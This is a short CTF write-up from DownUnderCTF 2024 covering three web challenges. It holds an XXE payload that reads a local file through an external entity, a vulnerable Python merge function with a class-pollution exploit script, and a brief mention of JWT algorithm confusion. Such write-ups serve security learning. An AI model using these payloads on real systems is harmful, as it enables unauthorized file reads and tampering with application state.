DownUnderCTF 2024
Information
Team: DeadSec
Write up
web/zoo feedback form
Desc
Simple xxe injection prob,
Inject exploit ( XML )
Exploit
1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///app/flag.txt">
]>
<root>
<feedback>&xxe;</feedback>
</root>
web/co2
Desc
Python Class Pollution with improper merge function. ( Similar with Prototype Pollution )
1
2
3
4
5
6
7
8
9
10
11
12
# Vulenrable function
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
url = "https://web-co2-b55776733224c2b7.2024.ductf.dev"
s = requests.session()
payload = {"title": "asdf","content": "asdf", "rating": 4, "referred": "asdf",'__class__':{'__init__':{'__globals__':{'flag':'true'}}}}
# login
s.post(f"{url}/login", data={"username": "whguswo", "password": "whguswo"})
# exploit
res = s.post(f"{url}/save_feedback", json=payload)
print(res.text)
web/i am confusion
Desc
JWT confusion Attack And Re-sign your JWT
Portswigger - JWT Confusion
Exploit
Solve with JWT Confusion
Comment
It’s been a while since I had time for CTF and I enjoyed it.
This post is licensed under CC BY 4.0 by the author.